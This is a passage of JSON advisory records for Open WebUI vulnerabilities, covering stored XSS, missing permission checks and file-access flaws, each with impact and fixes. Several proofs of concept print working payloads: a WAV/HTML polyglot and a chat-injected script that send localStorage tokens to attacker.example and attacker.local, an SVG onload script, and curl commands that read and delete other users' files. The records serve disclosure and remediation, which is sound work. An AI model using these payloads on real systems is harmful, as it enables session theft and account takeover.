perform actions as the victim user\n- **Data exfiltration** — read chat history, API keys, uploaded documents\n- **Multi-user environments** — shared Open WebUI instances are especially vulnerable (one malicious upload affects all viewers)\n- **Defense propagation failure** — DOMPurify is available and used elsewhere, but not applied to file preview paths\n\n## Suggested Remediation\n\nApply DOMPurify to all three file preview paths:\n\n```svelte\n\u003c!-- FilePreview.svelte:324 — FIX --\u003e\n{@html DOMPurify.sanitize(fileOfficeHtml)}\n\n\u003c!-- FileItemModal.svelte:560 — FIX --\u003e\n{@html DOMPurify.sanitize(excelHtml)}\n\n\u003c!-- FileItemModal.svelte:590 — FIX --\u003e\n{@html DOMPurify.sanitize(docxHtml)}\n```\n\nAlternatively, adopt a **defense-by-default pattern**: create a wrapper component that always applies DOMPurify, making unsanitized `{@html}` usage a code review flag.\n\n## References\n\n- CWE-79: Improper Neutralization of Input During Web Page Generation (XSS)\n- OWASP XSS Prevention Cheat Sheet\n- GHSA-x75g-rp99-qqpx: Previous Open WebUI report (DNS rebinding TOCTOU, different vulnerability class)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:18:27.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-hcwp-82g6-8wxc","https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc","https://github.com/open-webui/open-webui/releases/tag/v0.9.3","https://nvd.nist.gov/vuln/detail/CVE-2026-45318","https://github.com/advisories/GHSA-hcwp-82g6-8wxc"],"source_kind":"github","identifiers":["GHSA-hcwp-82g6-8wxc","CVE-2026-45318"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:10.750Z","epss_percentage":0.00209,"epss_percentile":0.11041,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oY3dwLTgyZzYtOHd4Y84ABW4u","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oY3dwLTgyZzYtOHd4Y84ABW4u","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.3","vulnerable_version_range":"\u003c= 0.9.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oY3dwLTgyZzYtOHd4Y84ABW4u/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qeDJ4LWo3NWYteHEzas4ABW4t","url":"https://github.com/advisories/GHSA-jx2x-j75f-xq3j","title":"Open WebUI: Read-Only Users Can Toggle Note Pin Status via Incorrect Permission Check (Write via Read-Only Access)","description":"### Summary\n\nThe `POST /api/v1/notes/{id}/pin` endpoint performs a write operation (toggling the `is_pinned` field) but only checks for `read` permission. Users with read-only access to a shared note can pin/unpin it, which is a state-modifying action that should require `write` permission. All other write endpoints (update, delete, access/update) correctly check for `write` permission.\n\n### Details\n\n**Affected code: `backend/open_webui/routers/notes.py` lines 412-444**\n\n```python\n@router.post('/{id}/pin', response_model=Optional[NoteModel])\nasync def pin_note_by_id(...):\n    # ...\n    if user.role != 'admin' and (\n        user.id != note.user_id\n        and not await AccessGrants.has_access(\n            user_id=user.id,\n            resource_type='note',\n            resource_id=note.id,\n            permission='read',        # BUG: should be 'write'\n            db=db,\n        )\n    ):\n        raise HTTPException(...)\n    \n    note = await Notes.toggle_note_pinned_by_id(id, db=db)  # write operation\n```\n\n**Compare with update endpoint (correct, line 318-327):**\n```python\nasync def update_note_by_id(...):\n    # ...\n    and not await AccessGrants.has_access(\n        permission='write',        # correctly checks 'write'\n    )\n```\n\n### PoC\n\n**Environment:** Open WebUI v0.9.2, default configuration with notes sharing enabled.\n\n**Setup:**\n1. UserA creates a note\n2. UserA shares note with UserB with `read` permission via `POST /api/v1/notes/{id}/access/update` with `{\"access_grants\":[{\"principal_type\":\"user\",\"principal_id\":\"USERB_ID\",\"permission\":\"read\"}]}`\n\n**Test:**\n```bash\n# Step 1: UserB reads note (READ permission) -\u003e 200 OK, write_access: false\ncurl -s http://TARGET/api/v1/notes/$NOTE_ID \\\n  -H \"Authorization: Bearer $TOKEN_B\"\n# Result: 200 OK, \"write_access\": false\n\n# Step 2: UserB updates note (WRITE operation) -\u003e 403 Forbidden (correctly blocked)\ncurl -s -X POST http://TARGET/api/v1/notes/$NOTE_ID/update \\\n  -H \"Authorization: Bearer $TOKEN_B\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"title\":\"HACKED\",\"content\":\"pwned\",\"data\":{\"type\":\"note\"}}'\n# Result: 403 Forbidden\n\n# Step 3: UserB pins note (WRITE operation, but only checks READ) -\u003e 200 OK (BUG!)\ncurl -s -X POST http://TARGET/api/v1/notes/$NOTE_ID/pin \\\n  -H \"Authorization: Bearer $TOKEN_B\"\n# Result: 200 OK, \"is_pinned\": true\n\n# Step 4: UserB can toggle pin repeatedly\ncurl -s -X POST http://TARGET/api/v1/notes/$NOTE_ID/pin \\\n  -H \"Authorization: Bearer $TOKEN_B\"\n# Result: 200 OK, \"is_pinned\": false (toggled back)\n```\n\n**E2E Verified Result:**\n- Step 1: UserB reads note (READ) -\u003e 200 OK ✓\n- Step 2: UserB updates note (WRITE) -\u003e 403 Forbidden ✓ (correctly blocked)\n- Step 3: UserB pins note (WRITE via READ) -\u003e 200 OK, is_pinned: true ✗ (BUG)\n- Step 4: UserB toggles pin again -\u003e 200 OK, is_pinned: false ✗ (repeated write)\n\n### Impact\n\n- A user with only `read` access to a shared note can toggle its `is_pinned` status\n- This modifies the note's state without write authorization\n- The pin status change is visible to the note owner and all other users with access\n- Privilege escalation from read to write on the pin operation\n\n**Limitations:** Only affects the `is_pinned` boolean field. Cannot modify title, content, or access_grants. Requires at least read access via explicit sharing.\n\n### Fix\n\nOne-line fix — change `permission='read'` to `permission='write'` in `pin_note_by_id`:\n\n```python\n# backend/open_webui/routers/notes.py, line 437\n- permission='read',\n+ permission='write',\n```\n\nThis makes the pin endpoint consistent with update and delete endpoints.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-05-14T20:18:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-jx2x-j75f-xq3j","https://github.com/open-webui/open-webui/releases/tag/v0.9.3","https://nvd.nist.gov/vuln/detail/CVE-2026-45316","https://github.com/advisories/GHSA-jx2x-j75f-xq3j"],"source_kind":"github","identifiers":["GHSA-jx2x-j75f-xq3j","CVE-2026-45316"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:10.751Z","epss_percentage":0.00218,"epss_percentile":0.12098,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qeDJ4LWo3NWYteHEzas4ABW4t","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qeDJ4LWo3NWYteHEzas4ABW4t","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.3","vulnerable_version_range":"\u003c= 0.9.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qeDJ4LWo3NWYteHEzas4ABW4t/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zODU2LTN2eHEtbTZmY84ABW4s","url":"https://github.com/advisories/GHSA-3856-3vxq-m6fc","title":"Open WebUI has XSS via SVG in /api/v1/channels/webhooks/{webhook_id}/profile/image","description":"As part of our research on improving our [AI pentest](https://www.aikido.dev/attack/aipentest), we have uncovered the following issue in Open WebUI. We've manually verified and tided up the report, but you can also find the original agent finding at the bottom of this report.\n\n### Summary\n\nThe channel webhook create/update flow accepts arbitrary `profile_image_url` values, including `data:image/svg+xml;base64,...` payloads. The profile image endpoint then decodes and serves this SVG as `image/svg+xml` without sanitization, allowing attacker-controlled script handlers (for example onload) to execute when the profile-image URL is opened in the browser.\n\n### Details\n\nThe server accepts `data:image/svg+xml;base64,...` values for `profile_image_url` when creating or updating a webhook. Later, `GET /api/v1/channels/webhooks/{webhook_id}/profile/image` detects `data:image`, base64-decodes it, derives the media type from the header (e.g., `image/svg+xml`), and returns a `StreamingResponse` with `Content-Disposition: inline` and `media_type` set to `image/svg+xml`. There is no sanitization or transformation. When this URL is opened in a browser, SVG event handlers such as onload execute in the application origin, resulting in stored XSS.\n\n### PoC\n\n1. Set up a new instance of Open WebUI and log in as admin\n2. In the Admin Panel, enable *Channels (Beta)* and click Save\n3. Create a low-privilege user in the Users tab\n4. As the attacker, use the low-privilege user to run the following script:\n\n```py\nimport base64\nimport secrets\n\nimport requests\n\nBASE_URL = \"http://127.0.0.1:14000\"\nEMAIL = \"low@local.test\"\nPASSWORD = \"low\"\n\nCHANNEL_NAME_PREFIX = \"xsswh-poc\"\nWEBHOOK_NAME = \"xss-webhook-poc\"\nSVG_CANARY = '\u003csvg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(origin)\"\u003e\u003c/svg\u003e'\n\nif __name__ == \"__main__\":\n    s = requests.Session()\n    s.headers.update({\"Content-Type\": \"application/json\"})\n\n    r = s.post(\n        f\"{BASE_URL}/api/v1/auths/signin\",\n        json={\"email\": EMAIL, \"password\": PASSWORD},\n        timeout=30,\n    )\n    r.raise_for_status()\n    s.headers[\"Authorization\"] = f\"Bearer {r.json()['token']}\"\n\n    r = s.post(\n        f\"{BASE_URL}/api/v1/channels/create\",\n        json={\n            \"name\": f\"{CHANNEL_NAME_PREFIX}-{secrets.token_hex(4)}\",\n            \"type\": \"group\",\n            \"user_ids\": [],\n            \"group_ids\": [],\n        },\n        timeout=30,\n    )\n    r.raise_for_status()\n    channel_id = r.json()[\"id\"]\n\n    payload = \"data:image/svg+xml;base64,\" + base64.b64encode(SVG_CANARY.encode()).decode()\n    r = s.post(\n        f\"{BASE_URL}/api/v1/channels/{channel_id}/webhooks/create\",\n        json={\"name\": WEBHOOK_NAME, \"profile_image_url\": payload},\n        timeout=30,\n    )\n    r.raise_for_status()\n    webhook_id = r.json()[\"id\"]\n\n    print(f\"{BASE_URL}/api/v1/channels/webhooks/{webhook_id}/profile/image\")\n```\n\nThis should print a URL like the following, which when visited (by any user), triggers a JavaScript popup proving XSS:\n\nhttp://127.0.0.1:14000/api/v1/channels/webhooks/aa7c925f-4584-4274-82bf-33a7e98a3365/profile/image\n\n\u003cimg width=\"1079\" height=\"222\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ce158ace-d14f-4a73-aeb0-e828aff005df\" /\u003e\n\n### Impact\n\nConditions required: The victim must be an authenticated, verified user. Channel feature must be enabled.\n\nStored XSS enables arbitrary JavaScript execution in the context of the application's origin for any viewer who loads the malicious profile image URL. An attacker can exfiltrate session tokens (localstorage) or API keys stored in the page context, perform unauthorized actions on behalf of the victim via same-origin APIs, alter settings, or pivot to broader account compromise. Because this vector is persisted in the database as part of a webhook's profile image, it remains active until removed.\n\n### Original Agent Report\n\n\u003cimg width=\"400\" alt=\"app aikido dev_ai-pentests_projects_116389_assessments_019d67d4-81c8-7dd2-bb9e-0a4a774b2c78_issues_sidebarIssue=20439766 (5)\" src=\"https://github.com/user-attachments/assets/0bfb2c7c-f7c4-49cd-a262-5ed9e1bb10df\" /\u003e","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:18:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.4,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-3856-3vxq-m6fc","https://github.com/open-webui/open-webui/releases/tag/v0.9.3","https://nvd.nist.gov/vuln/detail/CVE-2026-45314","https://github.com/advisories/GHSA-3856-3vxq-m6fc"],"source_kind":"github","identifiers":["GHSA-3856-3vxq-m6fc","CVE-2026-45314"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:10.751Z","epss_percentage":0.0022,"epss_percentile":0.1226,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zODU2LTN2eHEtbTZmY84ABW4s","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zODU2LTN2eHEtbTZmY84ABW4s","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.3","vulnerable_version_range":"\u003c= 0.9.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zODU2LTN2eHEtbTZmY84ABW4s/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tOGY5LTl3aGctZjR4cs4ABW4r","url":"https://github.com/advisories/GHSA-m8f9-9whg-f4xr","title":"Open WebUI has stored XSS via attacker-controlled file extension in /api/v1/audio/transcriptions","description":"## Summary                                                                                                                                                \n\n  The audio transcription upload endpoint takes the file extension from the user-supplied filename and saves the file under CACHE_DIR/audio/transcriptions/\u003cuuid\u003e.\u003cext\u003e. The /cache/{path} route serves these files via FileResponse, which sets Content-Type from the on-disk extension and emits no Content-Disposition. A verified user with the default-on chat.stt permission can upload a polyglot WAV+HTML file named pwn.html and trick any other user into opening the resulting URL — the response comes back as text/html and any embedded \u003cscript\u003e runs in the Open WebUI origin.\n\n## Details\n  Verified on main @ 8dae237a (v0.9.2):                                                                                                       \n  - backend/open_webui/routers/audio.py:1244-1249 — ext = safe_name.rsplit('.', 1)[-1] from user-supplied filename, then filename = f'{id}.{ext}'. No      \n  allowlist, no cross-check against file.content_type.                                                                                                   \n  - backend/open_webui/main.py:2768-2779 — /cache/{path:path} returns FileResponse(file_path). Starlette derives Content-Type from the filename extension  \n  and sets no Content-Disposition.                                                                                                                         \n  - backend/open_webui/utils/misc.py:889-921 — strict_match_mime_type defaults to ['audio/*', 'video/webm'], so Content-Type: audio/wav on the upload\n  passes regardless of the actual body.                                                                                                                    \n  - backend/open_webui/config.py:1482 — USER_PERMISSIONS_CHAT_STT defaults to True.                                                                      \n  - src/routes/+layout.svelte (lines 123, 142, 177, 528, 638, …) — JWT lives in localStorage.token, reachable from JS in the origin.                       \n  - backend/open_webui/utils/oauth.py:1736-1739 — OAuth token cookie set with httponly=False.                                                              \n                                                                                                                                                           \n##  PoC                                                                                                                                                      \n                                                                                                                                                           \n  Tested end-to-end against a harness re-exporting the exact handlers from audio.py and main.py. The cached response was \n  Content-Type: text/html; charset=utf-8 with no Content-Disposition.\n  ```python\n  import struct, httpx                                                                                                                                   \n\n  data = b'\\x80' * 44100                                                                                                                                   \n  wav  = struct.pack('\u003c4sI4s4sIHHIIHH4sI',\n          b'RIFF', 36 + len(data), b'WAVE',                                                                                                                \n          b'fmt ', 16, 1, 1, 44100, 44100, 1, 8,                                                                                                         \n          b'data', len(data)) + data                                                                                                                       \n  payload = wav + b'\u003cscript\u003ealert(document.domain);fetch(\"https://attacker.example/x?t=\"+localStorage.token)\u003c/script\u003e'\n                      \n                                                                                                                                                           \n  r = httpx.post(                                                                                                                                          \n      'https://VICTIM/api/v1/audio/transcriptions',                                                                                                        \n      headers={'Authorization': f'Bearer {ATTACKER_JWT}'},                                                                                                 \n      files={'file': ('pwn.html', payload, 'audio/wav')},                                                                                                  \n  )                                                                                                                                                        \n  fn = r.json()['filename']      # '\u003cuuid\u003e.html'\n #Send victim to: https://VICTIM/cache/audio/transcriptions/\u003cfn\u003e                                                                 \n```\n\n\nhttps://github.com/user-attachments/assets/c263bfcd-b923-4891-9c2f-a01c1faa6408\n\n\n\n                                                                                                                                        \n##  Impact                                                                                                                                                   \n                                                                                                                                                           \n  Authenticated stored XSS in the Open WebUI origin, exploitable by any verified user with the default-on chat.stt permission. Triggered by a single click from any other authenticated user. Leads to session-token theft (JWT lives in localStorage and the OAuth cookie is non-HttpOnly), enabling full account takeover of any user — including admins. With an admin token, in-process code execution on the server is theoretically reachable through Open WebUI's existing admin-only plugin mechanism, but that path is out of scope for this report.                                                                   \n\n  Affected: \u003c= 0.9.2.\n\n  Suggested fixes (any one breaks the chain): derive the saved extension from the validated MIME against a fixed audio allowlist; on /cache, force         \n  Content-Disposition: attachment and X-Content-Type-Options: nosniff (or restrict served extensions); move JWT to an HttpOnly; SameSite=Lax cookie.\n                                                                                                                                                           \n  Workaround: set USER_PERMISSIONS_CHAT_STT=False to revoke the upload right from non-admins.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:17:58.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-m8f9-9whg-f4xr","https://github.com/open-webui/open-webui/releases/tag/v0.9.3","https://nvd.nist.gov/vuln/detail/CVE-2026-45315","https://github.com/advisories/GHSA-m8f9-9whg-f4xr"],"source_kind":"github","identifiers":["GHSA-m8f9-9whg-f4xr","CVE-2026-45315"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:10.752Z","epss_percentage":0.00186,"epss_percentile":0.08234,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tOGY5LTl3aGctZjR4cs4ABW4r","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tOGY5LTl3aGctZjR4cs4ABW4r","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.3","vulnerable_version_range":"\u003c= 0.9.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tOGY5LTl3aGctZjR4cs4ABW4r/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00dnJjLW05Y2gtNm0zcs4ABW4o","url":"https://github.com/advisories/GHSA-4vrc-m9ch-6m3r","title":"Open WebUI has stored XSS via the HTML renedering view","description":"### Summary\nThrough the HTML rendering view, scripts can be injected and executed. \nThe finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.\n\n### Details\nThe frontend provides a function to visualize the HTML content of a current chat. The content is embedded in an iFrame with the following sandbox directive:\n\n`sandbox=\"allow-scripts allow-forms allow-same-origin\"`\n\nThis means that the content is placed in a sandbox but with permission to execute scripts and access the parent’s data (e.g., local storage). As a result, only a few functions are restricted (e.g., displaying an alert box), but in effect, the sandbox attribute is largely nullified.\n\n### PoC\nIf an HTML document containing a script is included in the chat, this script will be embedded in the view and executed. This can be achieved with a message like the following:\n```\nCreate an HTML form and insert the following script into the document:  \n`fetch('https://www.attacker.local/?' + localStorage.getItem('token'))`\n```\nBy entering this message, the script fetch('https://www.attacker.local/?' + localStorage.getItem('token')) is embedded, allowing the user's token to be read and sent to www.attacker.local.\n\n![grafik](https://github.com/user-attachments/assets/2bfa9f19-6bd7-40b4-82ca-20435838a304)\n\n### Impact\nFundamentally, this is a Self-XSS attack (executable only in the user's own context). However, the code could also be injected into another user's context through the following vectors:  \n\n- If an attacker manages to trick the user into entering the input (as users may not expect JavaScript execution via chat inputs).  \n- There is a `Chat Share` function. A shared chat can be cloned, potentially transferring the input to another user's context.  \n- If the instruction is embedded in a file (text, PDF, etc.) and the victim uploads the file to the chat, causing the content to be displayed (e.g., using the command \"Show content\").  \n- By importing a chat via \"Settings - Conversations - Import Conversations.\"  \n\nAn attack is only successful under these conditions, which is why the `Attack Complexity` vector has been set to `High`.  \nOverall, the likelihood of exploitation (Exploitability) is considered very low.\n\n### Recommendation\nThe iFrame sandbox should be defined more restrictively to prevent scripts from executing with access to the parent’s data.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:16:07.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-4vrc-m9ch-6m3r","https://nvd.nist.gov/vuln/detail/CVE-2026-45303","https://github.com/advisories/GHSA-4vrc-m9ch-6m3r"],"source_kind":"github","identifiers":["GHSA-4vrc-m9ch-6m3r","CVE-2026-45303"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:10.753Z","epss_percentage":0.00225,"epss_percentile":0.13026,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00dnJjLW05Y2gtNm0zcs4ABW4o","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00dnJjLW05Y2gtNm0zcs4ABW4o","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.6.5","vulnerable_version_range":"\u003c 0.6.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00dnJjLW05Y2gtNm0zcs4ABW4o/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yOHdoLThtN3ItZmgzM84ABW4n","url":"https://github.com/advisories/GHSA-r8wh-8m7r-fh33","title":"Open WebUI: Missing permission check in files API allows authenticated users to list, access and delete every uploaded file","description":"### Summary\nA missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform.\n\n### Details\nAll `files/` related endpoints lack permission checks.\n\n#### Listing all files\nFor example, let's see how file listing is implemented:\nhttps://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L107-L110\nhttps://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/models/files.py#L26\nNotice the endpoint depends only on an authenticated user check, no file filtering is done to match the uploaded files' `user_id` to the requesting user.\n\nThis problem repeats itself throughout the various route implementations, allowing any user to perform actions on any file.\nSome note worthy functions:\n#### Accessing the content of any file\nhttps://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L173-L193\n#### Deleting any file\nhttps://github.com/open-webui/open-webui/blob/e2b7296786053dfc77f6ae0205a1b195e05a712c/backend/apps/webui/routers/files.py#L224-L241\n\n### PoC\n#### Configuration\n1. I ran a clean install of the latest version using one of the docker one-liners on an Ubuntu desktop:\n`docker run -d -p 3000:8080 -v ollama:/root/.ollama -v open-webui:/app/backend/data --name open-webui --restart always ghcr.io/open-webui/open-webui:ollama`\n2. I created an admin user\n3. I created a second user to act as the threat actor with no elevated permissions\n4. Admin user uploaded `test.txt` in a conversation with model\n5. Admin user uploaded `mydeepest_secret.docx` in a conversation with model\n\n#### Listing files uploaded by other users\n1. Login to threat actor\n2. Perform a GET request to `/api/v1/files/`\n```sh\ncurl -X 'GET' \\\n  'http://localhost:3000/api/v1/files/' \\\n  -H 'accept: application/json'\n```\n```json\n[\n  {\n    \"id\": \"b9733e9c-0714-4425-8915-d0361bf66dfc\",\n    \"user_id\": \"c0c16e7a-6f81-4863-8b71-e56e2e389cf1\",\n    \"filename\": \"b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt\",\n    \"meta\": {\n      \"name\": \"test.txt\",\n      \"content_type\": \"text/plain\",\n      \"size\": 4,\n      \"path\": \"/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt\"\n    },\n    \"created_at\": 1724709202\n  },\n  {\n    \"id\": \"8f058e18-fec1-4b9f-bb4e-c17f39d03c98\",\n    \"user_id\": \"c0c16e7a-6f81-4863-8b71-e56e2e389cf1\",\n    \"filename\": \"8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx\",\n    \"meta\": {\n      \"name\": \"mydeepest_secret.docx\",\n      \"content_type\": \"application/vnd.openxmlformats-officedocument.wordprocessingml.document\",\n      \"size\": 6485,\n      \"path\": \"/app/backend/data/uploads/8f058e18-fec1-4b9f-bb4e-c17f39d03c98_mydeepest_secret.docx\"\n    },\n    \"created_at\": 1724710236\n  }\n]\n```\n\n#### Accessing other users' file content\n1. Login to threat actor\n2. Perform a GET request to `/api/v1/files/{id}/content`\n```sh\ncurl -X 'GET' \\\n  'http://localhost:3000/api/v1/files/b9733e9c-0714-4425-8915-d0361bf66dfc/content' \\\n  -H 'accept: application/json'\n```\n```\nwow\n```\n\n#### Deleting another user's uploaded file\n1. Login to threat actor\n2. Perform a DELETE request to `/api/v1/files/{id}`\n```sh\ncurl -X 'DELETE' \\\n  'http://localhost:3000/api/v1/files/8f058e18-fec1-4b9f-bb4e-c17f39d03c98' \\\n  -H 'accept: application/json'\n```\n```json\n{\n  \"message\": \"File deleted successfully\"\n}\n```\n3. We will verify this action by furthur listing all files as mentioned above:\n```json\n[\n  {\n    \"id\": \"b9733e9c-0714-4425-8915-d0361bf66dfc\",\n    \"user_id\": \"c0c16e7a-6f81-4863-8b71-e56e2e389cf1\",\n    \"filename\": \"b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt\",\n    \"meta\": {\n      \"name\": \"test.txt\",\n      \"content_type\": \"text/plain\",\n      \"size\": 4,\n      \"path\": \"/app/backend/data/uploads/b9733e9c-0714-4425-8915-d0361bf66dfc_test.txt\"\n    },\n    \"created_at\": 1724709202\n  }\n]\n```\n\n### Impact\nHaving access to user uploaded files, regardless of ownership or permission level, breaks the confidentiality of sensitive data stored by users. Furthermore, the ability to delete other user's uploaded files disrupts the integrity of the system.\n\n### Personal Notice\nIn case this submission does get recognized and numbered as a CVE I'd perfer to be credited by my full name - Yuval Gal, instead of my GitHub handle.\n\nThanks in advance and have a good week (:\n\n## Credits\n\nThis vulnerability was reported by **Yuval Gal** (GitHub: @vi11ain).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:15:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33","https://nvd.nist.gov/vuln/detail/CVE-2026-45301","https://github.com/advisories/GHSA-r8wh-8m7r-fh33"],"source_kind":"github","identifiers":["GHSA-r8wh-8m7r-fh33","CVE-2026-45301"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:10.753Z","epss_percentage":0.00273,"epss_percentile":0.19139,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yOHdoLThtN3ItZmgzM84ABW4n","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yOHdoLThtN3ItZmgzM84ABW4n","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.3.16","vulnerable_version_range":"\u003c= 0.3.15"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yOHdoLThtN3ItZmgzM84ABW4n/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02Z2gyLXE3Y3AtOXFmNs4ABW4l","url":"https://github.com/advisories/GHSA-6gh2-q7cp-9qf6","title":"Open WebUI has Stored Cross-Site Scripting In Profile Picture","description":"## Summary\n\nThe `profile_image_url` field on the user profile update form accepted arbitrary `data:` URI values without MIME-type validation. Two distinct attack paths were independently demonstrated by separate reporters:\n\n1. **`data:text/html;base64,...` in a new browser tab** (raresvis, 2025-04-17) — when a victim right-clicks a user's profile picture and chooses \"Open image in new tab\", the browser navigates to the data: URL and executes embedded scripts in the `data:` origin. Limited to social-engineering / redirect attacks because the script does not run in the application origin.\n\n2. **`data:image/svg+xml;base64,...` re-served by the application origin** (Gh05t666nero, 2026-01-09) — `GET /api/v1/users/{user_id}/profile/image` decoded the base64 and returned `StreamingResponse(media_type=\u003cuser-controlled\u003e)` extracted from the `data:` header. With `media_type=image/svg+xml` and `Content-Disposition: inline`, the SVG-embedded scripts executed in the **application origin**, enabling JWT theft from `localStorage` and full account takeover of any user — including admins — who loaded the malicious profile image URL.\n\nBoth attack paths share the same root cause (lack of MIME-type validation on `profile_image_url`) and are closed by the same fix.\n\n## Vulnerable code (v0.7.0)\n\n`backend/open_webui/routers/users.py` `get_user_profile_image_by_id()`:\n\n```python\nelif user.profile_image_url.startswith(\"data:image\"):\n    header, base64_data = user.profile_image_url.split(\",\", 1)\n    image_data = base64.b64decode(base64_data)\n    image_buffer = io.BytesIO(image_data)\n    media_type = header.split(\";\")[0].lstrip(\"data:\")  # user-controlled\n    return StreamingResponse(\n        image_buffer,\n        media_type=media_type,\n        headers={\"Content-Disposition\": \"inline\"},\n    )\n```\n\n## Fix\n\nCommit `773787c74` (2026-02-11), first contained in tag **v0.8.0**, applies the `validate_profile_image_url` field validator to every form that accepts `profile_image_url` (`UserModel`, `UpdateProfileForm`, `SignupForm` in `backend/open_webui/models/users.py` and `backend/open_webui/models/auths.py`). The validator explicitly rejects `data:image/svg+xml` and any non-image data URI, allowing only `data:image/{png,jpeg,gif,webp};base64` plus known internal paths and `http(s)://` URLs. This blocks both attack vectors at form submission time, so a malicious URL can no longer be persisted to the 